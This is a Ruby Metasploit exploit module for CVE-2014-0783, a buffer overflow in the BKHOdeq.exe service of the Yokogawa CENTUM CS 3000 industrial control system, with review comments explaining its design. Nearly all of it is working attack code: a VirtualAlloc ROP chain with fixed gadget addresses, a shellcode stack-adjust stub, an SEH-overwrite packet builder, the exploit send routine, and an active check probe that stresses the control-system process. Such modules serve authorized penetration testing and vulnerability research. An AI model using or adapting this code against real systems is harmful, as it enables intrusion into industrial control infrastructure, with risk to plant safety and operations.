##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
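# Yokogawa CENTUM CS 3000 - BKHOdeq.exe SEH overwrite (CVE-2014-0783).
#
# Packet body layout built by #exploit:
#   [StackPivotAdjustment filler][ROP chain][stack_adjust stub][payload]
#   [filler up to Offset][SEH record]
# The overwritten SEH handler (target 'Ret') is an "ADD ESP,9B8 # RETN" gadget
# in BKHOdeq.exe that pivots into the ROP chain. The chain is a mona.py
# VirtualAlloc chain; presumably the stack_adjust stub and the encoded payload
# then run inline from the freshly (re)protected buffer.
#
# All gadget and IAT addresses are fixed, so the chain is specific to
# R3.08.50 with the listed module builds on Windows XP SP3 / 2003 SP2.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Seh

  # Body length advertised in the header by #check. The intent (see #check)
  # is to force an allocation the service cannot satisfy while it parses the
  # header, so that it answers with a status word rather than reading a body.
  CHECK_PROBE_LENGTH = 0xffffffff

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow',
        'Description' => %q{
          This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability
          exists in the service BKHOdeq.exe when handling specially crafted packets. This module has
          been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3 and Windows
          2003 SP2.
        },
        'Author' => [
          'juan vazquez',
          'Redsadic <julian.vilas[at]gmail.com>'
        ],
        'References' => [
          [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ],
          [ 'CVE', '2014-0783']
        ],
        'Payload' => {
          # 6000 bytes of payload plus the fixed prefix (108 + 1828 + 17 bytes)
          # stays below the 8660-byte SEH offset of the shipped target.
          'Space' => 6000,
          'DisableNops' => true,
          # ':' and CR/LF must not appear anywhere in the encoded payload.
          'BadChars' => ":\r\n"
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Yokogawa CENTUM CS 3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]',
            {
              'Ret' => 0x0042068e, # stackpivot from 2488 BKHOdeq.exe # ADD ESP,9B8 # RETN
              'Offset' => 8660, # distance from the start of the body to the SEH record
              'StackPivotAdjustment' => 108 # filler so that the pivot lands on the ROP chain
            }
          ]
        ],
        'DefaultOptions' => {
          # NOTE(review): 'thread' looks chosen to keep the DCS service process
          # alive after the payload exits - confirm on a test system.
          'EXITFUNC' => 'thread',
          'WfsDelay' => 10
        },
        'DisclosureDate' => '2014-03-10',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # Required for EIP offset
        Opt::RPORT(20171)
      ]
    )
  end

  # Active probe: send a header whose advertised body length is 0xffffffff and
  # no body. A 4-byte answer with a zero status word is reported as Detected;
  # no answer, a different length or a non-zero status is reported as Safe.
  #
  # NOTE(review): this is not a passive fingerprint - it deliberately makes a
  # production DCS process attempt a huge allocation. The original authors
  # expect that to fail gracefully, but confirm on a test system before
  # running check against live equipment.
  #
  # @return [Msf::Exploit::CheckCode] Detected or Safe
  def check
    res = send_pkt(build_pkt(CHECK_PROBE_LENGTH))
    return Exploit::CheckCode::Detected if valid_response?(res)

    Exploit::CheckCode::Safe
  end

  # Builds the overflow body, wraps it in a packet and sends it once.
  # The body is pure data to the service; everything after 'Offset' bytes is
  # the SEH record generated by the Seh mixin for target.ret.
  def exploit
    my_payload = payload.encoded
    rop_chain = create_rop_chain

    data = rand_text(target['StackPivotAdjustment'])
    data << rop_chain
    data << stack_adjust
    data << my_payload

    # Guard the filler length explicitly: with a negative length rand_text()
    # would not necessarily raise, and a short filler silently misplaces the
    # SEH record instead of failing loudly.
    filler_len = target['Offset'] - data.length
    if filler_len < 0
      fail_with(Failure::BadConfig, "Exploit buffer (#{data.length} bytes) exceeds the SEH offset (#{target['Offset']})")
    end
    data << rand_text(filler_len)
    data << generate_seh_record(target.ret)

    pkt = build_pkt(data.length, data)

    print_status("Trying target #{target.name}, sending #{pkt.length} bytes...")
    connect
    begin
      sock.put(pkt)
    ensure
      # Always release the socket, even if the write raises.
      disconnect
    end
  end

  # Builds a request packet: a 16-byte header followed by +data+.
  #
  # Header fields (names as labelled by the original module): 4-byte iMark,
  # 4-byte big-endian data length, 4-byte NumSet, 2-byte req, 2-byte unknown.
  # Only the length is meaningful here; the other fields are random bytes.
  # Note that pack("N") keeps only the low 32 bits of +data_length+.
  #
  # @param data_length [Integer] value placed in the length field
  # @param data [String] packet body, empty by default
  # @return [String] header + data
  def build_pkt(data_length, data = "")
    header = rand_text(4)             # iMark
    header << [data_length].pack("N") # Data length
    header << rand_text(4)            # NumSet
    header << rand_text(2)            # req
    header << rand_text(2)            # Unknown

    header + data
  end

  # Opens a connection, writes +data+ and reads a single response.
  #
  # The socket is released in an ensure block so that a failed write or a
  # read error does not leave the connection open.
  #
  # @param data [String] raw packet to send
  # @return [String, nil] whatever sock.get_once returned
  def send_pkt(data)
    connect
    begin
      sock.put(data)
      sock.get_once
    ensure
      disconnect
    end
  end

  # True only for a 4-byte answer whose big-endian status word is 0.
  #
  # @param data [String, nil] raw response
  # @return [Boolean]
  def valid_response?(data)
    !data.nil? && data.length == 4 && result_code(data).zero?
  end

  # First 4 bytes of +data+ as a big-endian unsigned integer.
  #
  # @param data [String] response of at least 4 bytes
  # @return [Integer]
  def result_code(data)
    data.unpack("N").first
  end

  # Small x86 stub executed after the ROP chain: points ESP at the thread's
  # stack limit (TEB->StackLimit, at NT_TIB offset 8) minus 2000 bytes so the
  # payload gets stack space that does not overlap the buffer it lives in.
  #
  # @return [String] raw machine code, 17 bytes
  def stack_adjust
    adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18]  # get teb
    adjust << "\x83\xC0\x08"             # add eax, byte 8     # get pointer to stacklimit
    adjust << "\x8b\x20"                 # mov esp, [eax]      # put esp at stacklimit
    adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000      # plus a little offset

    adjust
  end

  # VirtualAlloc ROP chain for the fixed module bases listed per gadget.
  #
  # Stage 1 loads the address of VirtualAlloc() from an IAT slot into EAX and
  # ends in a gadget whose "ADD ESP,6D8" skips the next 1752 (0x6D8) bytes;
  # stage 2 sets up the remaining registers and triggers the call via PUSHAD.
  #
  # @return [String] packed chain: stage 1, 1752 bytes of padding, stage 2
  def create_rop_chain
    # rop chain generated with mona.py - www.corelan.be
    stage1 = [
      0x63b27a60, # RET # padding on XP SP3
      0x63b27a60, # RET # padding on XP SP3
      0x63b27a5f, # POP EAX # RETN [libbkhMsg.dll]
      0x61e761e0, # ptr to &VirtualAlloc() [IAT LibBKCCommon.dll]
      0x61e641e4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [LibBKCCommon.dll]
      0x00405522, # PUSH EAX # TEST EAX,C0330042 # POP ESI # ADD ESP,6D8 # RETN [BKHOdeq.exe]
    ]

    stage2 = [
      0x61e62aa4, # POP EBP # RETN [LibBKCCommon.dll]
      0x61e648c0, # & push esp # ret [LibBKCCommon.dll]
      0x66f3243f, # POP EBX # RETN [libBKBEqrp.dll]
      0x00000001, # 0x00000001-> ebx
      0x61e729dd, # POP EDX # MOV EAX,5E5FFFFF # RETN [LibBKCCommon.dll]
      0x00001000, # 0x00001000-> edx
      0x63a93f6f, # POP ECX # RETN [libbkhopx.dll]
      0x00000040, # 0x00000040-> ecx
      0x63ad1f6a, # POP EDI # RETN [libbkhOdeq.dll]
      0x63dd3812, # RETN (ROP NOP) [libbkhCsSrch.dll]
      0x61e60b4c, # POP EAX # RETN [LibBKCCommon.dll]
      0x90909090, # nop
      0x63ae5cc3, # PUSHAD # RETN [libbkhOdbh.dll]
    ]

    chain = stage1.pack("V*")
    chain << rand_text(1752) # Padding because of the "ADD ESP,6D8" instr
    chain << stage2.pack("V*")

    chain
  end
end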